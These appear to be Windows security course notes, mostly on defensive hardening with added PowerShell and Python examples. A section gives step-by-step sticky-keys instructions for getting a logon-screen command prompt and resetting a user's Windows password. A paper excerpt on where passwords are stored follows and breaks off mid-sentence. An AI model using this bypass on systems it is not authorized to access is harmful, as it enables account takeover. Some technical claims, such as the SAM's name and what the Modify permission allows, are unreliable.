updates must be tested before being applied (e.g., on centrally managed corporate systems) should the "download, but let me 
choose when to install" option be used instead, and then the testing has to actually happen. 






Performance and Maintenance 


. Administrative Tools is where you define your policies and monitor system activity. 

. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools 






(Screenshot: the Control Panel's "or pick a Control Panel icon" view, with Administrative Tools shown 
alongside Power Options, Scheduled Tasks and System.) 



6. Windows Security Process 


Define a strong password policy 


Enforce password history - set to "5". A user cannot reuse any of their last five passwords when their password expires. 


Maximum password age - default is "42". This specifies how long a user can use the same password; after 42 days the 
user must change it. Set to "90" for user accounts and "30" for administrator accounts. 

Minimum password length - set to "8". This means that a password must be at least 8 characters long (longer is better). 

Password must meet complexity requirements - set to "Enabled". A password then has to contain characters from at least 
three of the four classes (upper case letters, lower case letters, digits, special characters) and must not contain the 
user's account name. 

Store password using reversible encryption for all users in the domain - always leave "Disabled". If you enable this 
policy, passwords are stored in a form that can be decrypted back to plaintext, so anyone who obtains the account 
database has every password outright. 
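The three checks that matter at password-change time (minimum length, complexity, and the history of previous passwords) are easy to misstate, so here they are as code. This is an added example written for these notes in Python, not Microsoft's implementation: the complexity rule follows the Windows definition (three of the four character classes, and the account name must not appear in the password), while the history is kept as a list of fingerprints. The fingerprint function is a stand-in: Windows keeps NT hashes of previous passwords, and SHA-256 over the UTF-16 encoding is used here only so the example runs with the standard library. The sample passwords and the account names are constructed.

```python
import hashlib
import string


def meets_complexity(password: str, account_name: str) -> bool:
    """'Password must meet complexity requirements' as Windows defines it: at least
    three of the four character classes, and the account name (when 3+ characters)
    must not appear in the password, compared case-insensitively.  Any character that
    is not an ASCII letter or digit is counted as 'special' here, a simplification."""
    classes = [
        any(c in string.ascii_uppercase for c in password),
        any(c in string.ascii_lowercase for c in password),
        any(c in string.digits for c in password),
        any(c not in string.ascii_letters + string.digits for c in password),
    ]
    if sum(classes) < 3:
        return False
    if len(account_name) >= 3 and account_name.lower() in password.lower():
        return False
    return True


def _fingerprint(password: str) -> str:
    # Stand-in for the hash Windows stores in the password history (it uses NT
    # hashes; SHA-256 is used here only to keep the example self-contained).
    return hashlib.sha256(password.encode("utf-16-le")).hexdigest()


def check_new_password(password, account_name, history, min_length=8, history_size=5):
    """Apply the policy from these notes: minimum length 8, complexity enabled, and
    'enforce password history' of the last five.  Returns (ok, list_of_reasons)."""
    reasons = []
    if len(password) < min_length:
        reasons.append(f"shorter than {min_length} characters")
    if not meets_complexity(password, account_name):
        reasons.append("does not meet complexity requirements")
    if _fingerprint(password) in history[-history_size:]:
        reasons.append(f"reuses one of the last {history_size} passwords")
    return (not reasons, reasons)


def record_password(password, history, history_size=5):
    """Append the new fingerprint and keep only the most recent `history_size`."""
    history = history + [_fingerprint(password)]
    return history[-history_size:]


if __name__ == "__main__":
    history = []
    for candidate in ["Winter2024!", "Winter2024!", "alice2024!!", "Sh0rt!", "Spring2024!"]:
        ok, why = check_new_password(candidate, "alice", history)
        print(f"{candidate!r:16} -> {'accepted' if ok else 'rejected: ' + '; '.join(why)}")
        if ok:
            history = record_password(candidate, history)
```

The history only blocks the last five entries, so a user who cycles through six passwords in quick succession returns to the original; that is what the "minimum password age" setting (not covered above) exists to prevent.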


Define an account lockout policy 

These policy settings help you to prevent attackers from guessing users' passwords, and they decrease the likelihood of 
successful attacks on your network. 

Account lockout duration - the number of minutes a locked-out account remains locked out before automatically 
becoming unlocked 

Account lockout threshold - the number of failed logon attempts that causes a user account to be locked out 

Reset account lockout counter after - the number of minutes that must elapse before the failed logon attempt counter is 
reset to 0. Be careful not to set these too aggressively: if users lock themselves out by mistyping their passwords, this 
creates more work for your organization, and an attacker who knows the policy can deliberately lock out legitimate 
accounts by feeding them wrong passwords (a denial of service). 
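How the three lockout settings interact is easiest to see by replaying logon attempts against them. The simulation below is an added example written for these notes, not code from Windows: it models the semantics described above (a counter of consecutive failures, cleared after the reset window or a successful logon; a lock-out once the counter reaches the threshold; automatic unlock after the duration, or never when the duration is 0). The policy values and the sequences of attempts are constructed, with times in minutes.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class LockoutPolicy:
    threshold: int      # Account lockout threshold: failures that trigger lock-out (0 = never lock)
    reset_after: int    # Reset account lockout counter after: quiet minutes before the counter clears
    duration: int       # Account lockout duration: minutes locked (0 = until an administrator unlocks)


@dataclass
class AccountState:
    failures: int = 0
    last_failure: Optional[int] = None
    locked_until: Optional[int] = None   # minute at which the lock expires; None = not locked


Attempt = Tuple[int, str, bool]   # (minute, account, password_correct)


def simulate(policy: LockoutPolicy, attempts: List[Attempt]) -> List[str]:
    """Replay logon attempts (in time order) and return one outcome per attempt:
    'ok', 'bad-password' or 'locked'."""
    states: Dict[str, AccountState] = {}
    outcomes = []
    for minute, account, correct in attempts:
        st = states.setdefault(account, AccountState())
        if st.locked_until is not None:
            if policy.duration and minute >= st.locked_until:
                st.locked_until, st.failures = None, 0       # lock has expired
            else:
                outcomes.append("locked")                    # even the right password is refused
                continue
        if st.last_failure is not None and minute - st.last_failure >= policy.reset_after:
            st.failures = 0                                  # quiet window elapsed
        if correct:
            st.failures = 0
            outcomes.append("ok")
            continue
        st.failures += 1
        st.last_failure = minute
        if policy.threshold and st.failures >= policy.threshold:
            st.locked_until = minute + policy.duration
            outcomes.append("locked")
        else:
            outcomes.append("bad-password")
    return outcomes


if __name__ == "__main__":
    policy = LockoutPolicy(threshold=5, reset_after=30, duration=30)
    # An attacker guesses alice's password five times; alice then tries her real one.
    attack = [(m, "alice", False) for m in range(5)] + [(10, "alice", True), (34, "alice", True)]
    print("alice :", simulate(policy, attack))
    # Guessing slowly, one attempt per 40 minutes, never accumulates five failures.
    slow = [(m, "carol", False) for m in (0, 40, 80, 120, 160)]
    print("carol :", simulate(policy, slow))
```

Two things fall out of the replay. First, the lock-out is indifferent to who caused the failures, which is the denial-of-service risk noted above: alice is refused at minute 10 with the correct password. Second, a long reset window is what makes slow, spaced-out guessing accumulate; with the 30-minute window, carol's attacker never trips the threshold, so the reset window has to be chosen with the threshold, not in isolation.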



Define an audit policy 

Directory service access - enable to track accesses to an Active Directory® directory service object that has its own 
system access control list (SACL) 

Logon events - enable to see when someone has logged on or off to the computer 
Privilege use - enable to see when someone performs a user right 

Policy change - enable to see attempts to change local security policies, user rights assignments, auditing policies, or trust 
policies 

System events - enable to see when someone has shut down or restarted the computer, or when a process or program 
tries to do something it does not have permission to do . 


Security Setting 

Success - setting generates an event when the requested action succeeds 
Failure - setting generates an event when the requested action fails 
No Auditing - does not generate an event for the associated action 


Policy                             Security Setting 
Audit account logon events         Success, Failure 
Audit account management           Success, Failure 
Audit directory service access     No auditing 
Audit logon events                 Success, Failure 
Audit object access                No auditing 
Audit policy change                Success, Failure 
Audit privilege use                Failure 
Audit process tracking             Failure 
Audit system events                Failure 


Event Viewer 


. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools -> Event Viewer 
. Displays logs that capture events occurring on the system 

. Which events are recorded depends on the policies you have created and/or enabled (local security policy, audit policies, etc.) 
. Three logs: System, Application and Security, used by the Windows operating system, Windows applications and 
the security subsystem respectively 

. Application log - events logged by programs 
. Security log - security audit events, including any successful or unsuccessful logon attempts (only when the 
corresponding audit policy is enabled) 

. System log - events logged by system components (e.g., a driver fails to load during startup) 


Services 


. To view all available services 

. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools -> Services 


Disable unnecessary services 

1. Turning off unnecessary services can greatly reduce your exploit risk (every listening service is attack surface), while 
improving system performance 

2. IIS - web server capabilities 

3. NetMeeting Remote Desktop Sharing - remote control of the desktop through NetMeeting (a conferencing/VoIP program) 


4. Remote Desktop Help Session Manager 

5. Remote Registry - allows remote users to edit registry 

6. Routing and Remote Access - allows the system to be used as a router 

7. Simple File Sharing 

8. SSDP Discovery Service - plug and play 

9. Telnet - allows remote users to log on 

10. Universal Plug and Play Device Host - installation of plug and play devices 

11. Windows Messenger Service - not needed for Windows instant messaging; it only enables the 'net send' command. 
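Walking through the Services console for each of the items above is error-prone on more than one machine. The script below is an added example (not from the course notes) that audits, and optionally disables, the listed services by their short service names. The mapping from the display names in the list to these short names is an assumption of this example (they are the XP-era names, and some no longer exist on current Windows, which the script reports rather than fails on); Simple File Sharing is omitted because it is a Folder Options setting rather than a service. Run it elevated.

```powershell
# Added example: audit and optionally disable the services listed above.
# Short names are assumed XP-era service names; missing services are reported and skipped.

$Unnecessary = @{
    'W3SVC'          = 'IIS - web server'
    'mnmsrvc'        = 'NetMeeting Remote Desktop Sharing'
    'RDSessMgr'      = 'Remote Desktop Help Session Manager'
    'RemoteRegistry' = 'Remote Registry'
    'RemoteAccess'   = 'Routing and Remote Access'
    'SSDPSRV'        = 'SSDP Discovery Service'
    'TlntSvr'        = 'Telnet'
    'upnphost'       = 'Universal Plug and Play Device Host'
    'Messenger'      = 'Windows Messenger Service (net send)'
}

function Disable-UnnecessaryService {
    param([hashtable]$Services, [switch]$Enforce)

    foreach ($name in $Services.Keys | Sort-Object) {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        if (-not $svc) {
            "{0,-16} not installed                 ({1})" -f $name, $Services[$name]
            continue
        }
        # Startup type (Auto/Manual/Disabled) is exposed through WMI, not Get-Service on older hosts.
        $start = (Get-CimInstance Win32_Service -Filter "Name='$name'").StartMode
        "{0,-16} status={1,-8} start={2,-9} ({3})" -f $name, $svc.Status, $start, $Services[$name]
        if ($Enforce) {
            # Stop the running instance, then keep it from starting again at boot.
            if ($svc.Status -eq 'Running') { Stop-Service -Name $name -Force }
            Set-Service -Name $name -StartupType Disabled
        }
    }
}

Disable-UnnecessaryService -Services $Unnecessary             # audit only: print current state
# Disable-UnnecessaryService -Services $Unnecessary -Enforce  # apply: stop and disable
```

Run the audit form first and keep its output; a service that is later found running again, or whose startup type has changed back to Auto, is itself a finding worth investigating.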


The Processes Tab 

. Shows all running processes; also shows the owner, CPU usage and memory usage of each process 
. Allows you to sort processes by name, user, CPU or memory usage 


. Right-click on the taskbar -> click Task Manager -> Processes tab 



Windows Task Manager (screenshot) - Processes tab 
Tabs: Applications | Processes | Performance | Networking | Users 

Image Name     User Name        CPU   Mem Usage 
taskmgr.exe    student          08    4,208 K 
alg.exe        LOCAL SERVICE    00    3,212 K 
msimn.exe      student          00    14,504 K 
IEXPLORE.EXE   student          02    24,192 K 
spoolsv.exe    SYSTEM           00    4,100 K 
svchost.exe    LOCAL SERVICE    00    4,176 K 
msmsgs.exe     student          00    1,488 K 
svchost.exe    NETWORK SERVICE  00    3,012 K 
svchost.exe    SYSTEM           00    16,964 K 
svchost.exe    NETWORK SERVICE  00    3,808 K 
svchost.exe    SYSTEM           00    4,424 K 
lsass.exe      SYSTEM           00    1,624 K 
services.exe   SYSTEM           00    3,748 K 
winlogon.exe   SYSTEM           00    1,340 K 
csrss.exe      SYSTEM           00    3,368 K 
explorer.exe   student          02    14,548 K 
smss.exe       SYSTEM           00    388 K 
wscntfy.exe    student          00    1,788 K 
System         SYSTEM           00    236 K 

[ ] Show processes from all users                      [End Process] 

Processes: 20    CPU Usage: 12%    Commit Charge: 108M / 2460M 
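The screenshot shows what the Processes tab gives you: name, owner, CPU and memory, but not where each image was loaded from. The script below is an added example (not from the course notes) that reproduces those columns from PowerShell and adds the one check the tab cannot do: it flags processes whose executable lives outside the Windows and Program Files directories, which is where a process masquerading under a familiar name (a second "svchost.exe" in a user profile, say) tends to sit. The set of trusted roots is an assumption of this example; run it elevated so that -IncludeUserName can resolve the owner of every process.

```powershell
# Added example: a scripted Processes-tab review with an image-path check.
# Trusted roots are an assumption; run elevated so owners of system processes resolve.

function Get-ProcessReview {
    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

    Get-Process -IncludeUserName | ForEach-Object {
        $path = $_.Path          # $null for protected processes whose image we cannot query
        $inTrusted = $false
        if ($path) {
            foreach ($root in $trustedRoots) {
                if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $inTrusted = $true; break
                }
            }
        }
        [pscustomobject]@{
            Name   = $_.ProcessName
            PID    = $_.Id
            User   = $_.UserName
            CPUSec = [math]::Round([double]$_.CPU, 1)        # total processor time, seconds
            MemKB  = [int]($_.WorkingSet64 / 1KB)            # the "Mem Usage" column
            Path   = $path
            Flag   = if (-not $path) { 'no path (protected)' }
                     elseif (-not $inTrusted) { 'REVIEW: image outside trusted roots' }
                     else { '' }
        }
    } | Sort-Object CPUSec -Descending
}

Get-ProcessReview | Format-Table Name, PID, User, CPUSec, MemKB, Flag -AutoSize
```

A flagged path is a lead, not a verdict: many legitimate installers run from the user profile. The useful follow-up is the image's publisher signature and when it was written to disk.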


User Accounts 

. Local Users and Groups limit the ability of users and groups to perform certain actions by assigning them rights and 
permissions 

. User accounts 

. A collection of information that tells Windows what files a user can access, what changes a user can make 
. Allow multiple users to share a computer, but still have their own files and settings 


. Each user accesses their user account with a user name and password 
. Administrator account 

. Can change security settings, install software and hardware, and access all files on the computer, including making 
changes to other user accounts 


User and Group Account Permissions 

. Permissions are customizable per individual user or per group of users 
Full Control - all file permissions granted (administrator level) 

Modify - permission to change content but not ownership of files; cannot delete files or folders 
Read & Execute - permission allows or denies the user reading and executing files 
List Folder Contents - permission allows or denies the user viewing file names 
Read - permission allows or denies the user viewing the attributes of a file or folder 

Write - permission applies only to files and allows or denies the user making changes to the file and overwriting 
existing content (NTFS) 
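These permission levels are bundles of NTFS rights, and the way to see exactly what a level grants is to apply one and read the ACL back. The script below is an added example (not from the course notes) that grants the Modify level to a group on a folder with inheritance to its contents, then lists every access entry on the folder. The folder path (a scratch directory under %TEMP%) and the group (BUILTIN\Users, chosen because it exists on every machine) are assumptions for the demonstration; on a real share you would name the project group instead.

```powershell
# Added example: grant the Modify permission level to a group and read the resulting ACL back.
# Folder and group are placeholders for the demonstration.

function Grant-ModifyAccess {
    param([string]$Path, [string]$Identity)

    if (-not (Test-Path $Path)) { New-Item -ItemType Directory -Path $Path | Out-Null }
    $acl = Get-Acl -Path $Path

    # FileSystemRights.Modify bundles ReadAndExecute, Write and Delete on the object;
    # ContainerInherit + ObjectInherit make subfolders and files receive the same entry.
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $Identity,
        [System.Security.AccessControl.FileSystemRights]::Modify,
        ([System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'),
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Allow)
    $acl.AddAccessRule($rule)
    Set-Acl -Path $Path -AclObject $acl
}

function Show-FolderAccess {
    param([string]$Path)
    (Get-Acl -Path $Path).Access | ForEach-Object {
        [pscustomobject]@{
            Identity  = $_.IdentityReference
            Type      = $_.AccessControlType         # Allow or Deny
            Rights    = $_.FileSystemRights          # FullControl, Modify, ReadAndExecute, ...
            Inherited = $_.IsInherited               # came from the parent folder?
        }
    }
}

$folder = Join-Path $env:TEMP 'acl-demo'             # assumed scratch folder
Grant-ModifyAccess -Path $folder -Identity 'BUILTIN\Users'
Show-FolderAccess -Path $folder | Format-Table -AutoSize
```

When reviewing an existing folder, the entries with Inherited = False are the ones somebody set deliberately; a Deny entry always wins over an Allow, so check those first when a user unexpectedly loses access.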


Local vs. Domain Accounts 
. Local account 

. Username and encrypted password are stored on the computer itself 
. Permissions apply only to this computer 



. Domain account 

. Resides on a Domain Controller 

. A server that manages access to a set of network resources such as print servers, applications, etc. 

. A user can log into the domain controller and is given permissions to all network resources 

. Username and password are stored on a domain controller rather than on each computer the user accesses 
. Permissions apply to a network of computers and peripherals 
. Network administrators only have one place to store user information 


First Steps to Securing a Machine 
Step By Step 

1. Install the operating system and components (such as hardware drivers, system services, and so on). 

2. Install Service Packs and Windows Updates. 

3. Update installed applications (Adobe Reader, Flash, etc). 

4. Install anti-virus/anti-spyware utilities and scan for malware 

5. Configure critical operating system parameters (such as password policy, access control, audit policy, kernel mode 
driver configuration, and so on). 

6. Take ownership of files that have become inaccessible. 

7. Configure and monitor the security and auditing logs. 



8. When it is clean and secure, back up the system and create a restore point . 


Checklist 

1. Disable unnecessary services 

2. Disable dangerous features 

3. Employ email security practices 

4. Install and maintain malware protection software 

5. Patch more than just the OS 

6. Research and test updates 

7. Use a desktop firewall 

8. Look for alternatives to default applications 

How To Secure Network Hacking 
Step By Step - 

1. Go to the Run command 

2. Type "control userpasswords2" 

3. Then press "Enter" 

4. Open the "Advanced" tab 

5. Tick "Require users to press Ctrl+Alt+Delete" 

6. Apply 

7. OK 
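The point of the setting above is that Ctrl+Alt+Delete is the secure attention sequence: only Windows itself can receive it, so a logon dialog that appears after pressing it cannot be a fake one drawn by a program capturing passwords. The same option is stored as the DisableCAD registry value, and the script below is an added example (not from the course notes) that checks and enforces it from PowerShell, which is easier to apply to many machines than the dialog. It assumes an elevated session; the value and key path are the ones the Local Security Policy writes.

```powershell
# Added example: check and enforce "Require users to press Ctrl+Alt+Del" via the DisableCAD value.
# 0 = the secure attention sequence is required at logon, 1 = it is not. Run elevated to change it.

$KeyPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-SecureAttentionRequired {
    $v = Get-ItemProperty -Path $KeyPath -Name 'DisableCAD' -ErrorAction SilentlyContinue
    # When the value is absent, Windows' built-in default for this machine type applies.
    if ($null -eq $v) { return 'default (value not set)' }
    if ($v.DisableCAD -eq 0) { 'required' } else { 'NOT required' }
}

function Set-SecureAttentionRequired {
    if (-not (Test-Path $KeyPath)) { New-Item -Path $KeyPath -Force | Out-Null }
    Set-ItemProperty -Path $KeyPath -Name 'DisableCAD' -Value 0 -Type DWord
}

"Before: Ctrl+Alt+Del at logon is $(Get-SecureAttentionRequired)"
Set-SecureAttentionRequired
"After:  Ctrl+Alt+Del at logon is $(Get-SecureAttentionRequired)"
```

On a domain-joined machine the Group Policy setting "Interactive logon: Do not require CTRL+ALT+DEL" writes the same value and will overwrite a local change at the next policy refresh, so set it there instead.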

7. Backdoors 

"A backdoor is a method, often secret, of bypassing normal authentication in a product, computer system, cryptosystem 
or algorithm etc. Backdoors are often used for securing unauthorized remote access to a computer, or obtaining access to 
plaintext in cryptographic systems ." 

Overview 

The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen 
and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference. They 
noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities and 
permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a 
backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning (see 
trapdoor function ), and thus the term "backdoor" is now preferred. More generally, such security breaches were 
discussed at length in a RAND Corporation task force report published under ARPA sponsorship by J.P. Anderson and D.J. 
Edwards in 1970. 

A backdoor in a login system might take the form of a hard coded user and password combination which gives access to the 
system. A famous example of this sort of backdoor was used as a plot device in the 1983 film WarGames , in which the 
architect of the " WOPR " computer system had inserted a hardcoded password (his dead son's name) which gave the user 
access to the system, and to undocumented parts of the system (in particular, a video game-like simulation mode and direct 
interaction with the artificial intelligence) . 


Although the number of backdoors in systems using proprietary software (software whose source code is not publicly 
available) is not widely credited, they are nevertheless frequently exposed. Programmers have even succeeded in secretly 
installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if 
not actual permission. 


Type of backdoors 

1. Object code backdoors - Harder to detect backdoors involve modifying object code , rather than source code - object code 
is much harder to inspect, as it is designed to be machine-readable, not human-readable. These backdoors can be inserted 
either directly in the on-disk object code, or inserted at some point during compilation, assembly linking, or loading - in the 
latter case the backdoor never appears on disk, only in memory. Object code backdoors are difficult to detect by inspection 
of the object code, but are easily detected by simply checking for changes (differences), notably in length or in checksum, 
and in some cases can be detected or analyzed by disassembling the object code. Further, object code backdoors can be 
removed (assuming source code is available) by simply recompiling from source. 

Thus for such backdoors to avoid detection, all extant copies of a binary must be subverted, and any validation checksums 
must also be compromised, and source must be unavailable, to prevent recompilation. Alternatively, these other tools 
(length checks, diff, checksumming, disassemblers) can themselves be compromised to conceal the backdoor, for example 
detecting that the subverted binary is being checksummed and returning the expected value, not the actual value. To 
conceal these further subversions, the tools must also conceal the changes in themselves - for example, a subverted 
checksummer must also detect if it is checksumming itself (or other subverted tools) and return false values. This leads to 
extensive changes in the system and tools being needed to conceal a single change. 


Because object code can be regenerated by recompiling (reassembling, relinking) the original source code, making a 
persistent object code backdoor (without modifying source code) requires subverting the compiler itself - so that when it 
detects that it is compiling the program under attack it inserts the backdoor - or alternatively the assembler, linker, or 
loader. As this requires subverting the compiler, this in turn can be fixed by recompiling the compiler, removing the 
backdoor insertion code. This defense can in turn be subverted by putting a source meta-backdoor in the compiler, so that 
when it detects that it is compiling itself it then inserts this meta-backdoor generator, together with the original backdoor 
generator for the original program under attack. After this is done, the source meta-backdoor can be removed, and the 
compiler recompiled from original source with the compromised compiler executable: the backdoor has been bootstrapped. 
This attack dates to Karger & Schell (1974) , and was popularized in Thompson's 1984 article, entitled "Reflections on 
Trusting Trust"; it is hence colloquially known as the "Trusting Trust" attack. See compiler backdoors , below, for details. 
Analogous attacks can target lower levels of the system, such as the operating system, and can be inserted during the 
system booting process; these are also mentioned in Karger & Schell (1974) , and now exist in the form of boot sector 
viruses . 
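The paragraphs above make the practical point that an object-code backdoor is hard to see by reading the binary but easy to catch as a change in length or checksum, provided the baseline and the checking tool come from somewhere the attacker could not reach. The script below is an added example (not from the course notes) of that length-and-checksum check: it records the size and SHA-256 of every executable and DLL under a directory into a manifest, and a later run classifies each file as resized (code appended or replaced), patched in place (same length, different hash, the subtler case the text describes) or missing. The paths are assumptions. The caveat in the text applies in full: a manifest built on an already-subverted system, or checked with its hashing tool, proves nothing, so build and verify from trusted offline boot media.

```powershell
# Added example: the length-and-checksum check described above, as a manifest of binaries.
# Build the manifest on a known-clean system (or from offline boot media) and compare later.

function New-BinaryManifest {
    param([string[]]$Paths, [string]$ManifestFile)
    Get-ChildItem -Path $Paths -File -Include *.exe, *.dll -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Path   = $_.FullName
                Length = $_.Length
                SHA256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        } | Export-Csv -Path $ManifestFile -NoTypeInformation
}

function Compare-BinaryManifest {
    param([string]$ManifestFile)
    foreach ($entry in Import-Csv -Path $ManifestFile) {
        if (-not (Test-Path $entry.Path)) { "{0,-9} {1}" -f 'MISSING', $entry.Path; continue }
        $file = Get-Item $entry.Path
        $hash = (Get-FileHash -Path $entry.Path -Algorithm SHA256).Hash
        # Length differs: code was appended or the file replaced outright.
        # Same length, different hash: bytes were patched in place, which a size check alone misses.
        if ([int64]$entry.Length -ne $file.Length) { "{0,-9} {1}" -f 'RESIZED', $entry.Path }
        elseif ($entry.SHA256 -ne $hash)            { "{0,-9} {1}" -f 'PATCHED', $entry.Path }
    }
}

$manifest = Join-Path $env:TEMP 'system32-baseline.csv'      # assumed manifest location
New-BinaryManifest -Paths "$env:SystemRoot\System32" -ManifestFile $manifest   # on the clean system
Compare-BinaryManifest -ManifestFile $manifest                                   # on later checks
```

Legitimate updates will show up as RESIZED or PATCHED too, so the manifest has to be rebuilt after each patch cycle; what matters is that every change can be explained by an update you applied.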

2. Asymmetric backdoors - 

A traditional backdoor is a symmetric backdoor: anyone that finds the backdoor can in turn use it. The notion of an 
asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology: 
Crypto '96. An asymmetric backdoor can only be used by the attacker who plants it, even if the full implementation of the 
backdoor becomes public (e.g., via publishing, being discovered and disclosed by reverse engineering , etc.). Also, it is 
computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks 
have been termed kleptography ; they can be carried out in software, hardware (for example, smartcards) , or a combination 
of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology. Notably, NSA inserted a 
kleptographic backdoor into the Dual EC DRBG standard. 


There exists an experimental asymmetric backdoor in RSA key generation. This OpenSSL RSA backdoor was designed by 
Young and Yung, utilizes a twisted pair of elliptic curves, and has been made available. 

3. Compiler backdoors - 

A sophisticated form of black box backdoor is a compiler backdoor, where not only is a compiler subverted (to insert a 
backdoor in some other program, such as a login program), but it is further modified to detect when it is compiling itself 
and then inserts both the backdoor insertion code (targeting the other program) and the code modifying self-compilation, 
like the mechanism how retroviruses infect their host. This can be done by modifying the source code, and the resulting 
compromised compiler (object code) can compile the original (unmodified) source code and insert itself: the exploit has 
been boot-strapped. 

This attack was originally presented in Karger & Schell (1974 , p. 52, section 3.4.5: "Trap Door Insertion"), which was a 
United States Air Force security analysis of Multics , where they described such an attack on a PL/I compiler, and call it a 
"compiler trap door"; they also mention a variant where the system initialization code is modified to insert a backdoor 
during booting , as this is complex and poorly understood, and call it an "initialization trapdoor"; this is now known as a 
boot sector virus. 

This attack was then actually implemented and popularized by Ken Thompson, in his Turing Award acceptance speech in 
1983 (published 1984), "Reflections on Trusting Trust", which points out that trust is relative, and the only software one 
can truly trust is code where every step of the bootstrapping has been inspected. This backdoor mechanism is based on the 
fact that people only review source (human-written) code, and not compiled machine code (object code). A program called 
a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job. 

Thompson's paper describes a modified version of the Unix C compiler that would: 

• Put an invisible backdoor in the Unix login command when it noticed that the login program was being compiled, 
and as a twist 

• Also add this feature undetectably to future compiler versions upon their compilation as well. 


How To Crack Windows Password Via Backdoors 


Step By Step - 

1. Restart and boot the PC (via bootable CD or PD) 

2. When "INSTALL" is shown, press "Shift" 5 times 

3. When "Stkey" is shown, go to "Command" 

4. Rename the "Sethc.exe" and "cmd.exe" files by command 
EX. 1 - "Sethc.exe" -> "Sethcl.exe" 

2 - "Cmd.exe" -> "Sethc.exe" 

5. Then exit and cancel the install 

6. Now restart the PC 

7. When asked for the password, press "Shift" 5 times 

8. Now you are in the command prompt; type (Net_user_user name*) and press Enter 

9. Then enter the new password 

NOTE - Everything is typed without the (" ") quotes. 



8. Windows Password Hacking 


Abstract: Hacking is so simple! Not only do the operating system's loopholes offer opportunities to hackers, but 
applications like Skype and Google Chrome developed for the operating systems are also quite attractive to hackers. In this 
paper I present the various ways in which passwords, like the user account passwords stored by the operating system or 
the passwords required by different applications, are stored on the system and can be hacked by intended hackers. This 
paper presents in-depth research of the password storage mechanisms implemented in various versions of Windows and 
various application software and how they can be exploited by hackers. 

Keywords: Hacking, Windows, SAM, Skype 

Introduction 

Passwords can be login passwords for operating systems like Windows, login passwords for any application like Yahoo 
Messenger etc., or login passwords for any web site like email login passwords. We will study the password storage 
mechanisms and analyse their strengths for the Microsoft Windows operating system and the applications developed for it. 
Microsoft Windows is the name given to the family of operating systems developed by the US-based company 
Microsoft. Microsoft first introduced an operating environment named Windows 1.0 on November 20, 1985 [1]. 

In this paper, we will discuss Windows 98/ME, Windows NT/XP and Windows 7. We will also study how actually the 
passwords of various applications like Web Browsers store the passwords on local drives. 


Password Storage Mechanism for Windows operating system 

Windows-based computers utilize two methods for the hashing of user passwords, both having drastically different security 
implications. These are LAN Manager (LM) and NT LAN Manager version 2 (NTLMv2). A hash is the result of a 
cryptographic function that takes an arbitrarily sized string of data, performs a mathematical encryption 
function on it, and returns a fixed-size string. Windows typically uses the RC4 and MD5 encryption algorithms to encrypt the 
passwords before storing them. 



Windows 98/ME 

In Windows 98/ME passwords are stored in password list (.pwl) files. The name of the pwl file is the name by which we 
log on to the system. The encryption algorithms involved in the storage of passwords in pwl files are RC4 and MD5. All *.pwl 
files are generally stored in the C:\WINDOWS folder. We can find all the *.pwl files on the system using the operating 
system's Find option. 

These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable. 

Windows NT/XP/Vista/Windows 7 
SAM Database 

The majority of the different versions of Windows, like Windows NT, Windows 2000, Windows XP, Windows Vista and 
Windows 7, use the Systems Account Manager (SAM) to store users' credentials. SAM is implemented as a registry file to 
store users' passwords. A registry file is a hierarchical database that stores configuration settings and options on Windows 
operating systems. It contains information about system hardware, installed programs and settings, and profiles of 
each of the user accounts on your computer. All registry entries are stored as (key, value) pairs. Each key can contain 
sub keys. Keys are referenced with syntax similar to Windows path names, using backslashes to indicate levels of 
hierarchy. Each sub key has a mandatory name, which is a non-empty string that cannot contain any backslash and is not 
case sensitive. The registry keys can be accessed from a known root key handle. To refer to the SAM, the handle used is 
HKEY_LOCAL_MACHINE (HKLM). The HKLM key contains a sub key called SAM. The registry file for SAM is stored at the 
location: 

%SystemRoot%\System32\config\ 

It is used to refer to the full SAM database for all domains and users. Each SAM database contains all built-in accounts 
and configured accounts (all user and administrative accounts) for all domains. It notably contains the user names that can 
log on to that domain, a cryptographic hash of each user's password and the location of storage of their user registry keys, 
i.e. HKLM etc. [4]. The SAM registry file is locked for exclusive use while the OS is running. 



The SAM directory contains the users' passwords in either the old LM hash, for Windows prior to Windows NT Service Pack 4 
(SP4), or the NTLM hash, which is in use from Windows NT SP4 to date, including Windows 7. 

Because the SAM stores its information in the SAM database, we can assume that NT is only as secure as its SAM data. 

Password Storage Mechanisms for Applications 
Internet browser applications - 
Internet Explorer (IE): 

IE saves two types of passwords: sign-on passwords and HTTP basic authentications (generally proxy and router 
configuration) passwords. 

IE below version 7 stores both the passwords in encrypted form in the secure location known as 'Protected Storage' at the 
following registry location: 



HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider 

Windows introduced the secure 'Protected Storage' location to allow applications like IE/Outlook etc. to store secret 
credentials securely in an encrypted format. 

With version 7 onwards IE uses a new mechanism to store the sign-on passwords. The encrypted passwords for each 
website and auto complete passwords are stored along with hash of the website URL in the registry location: 

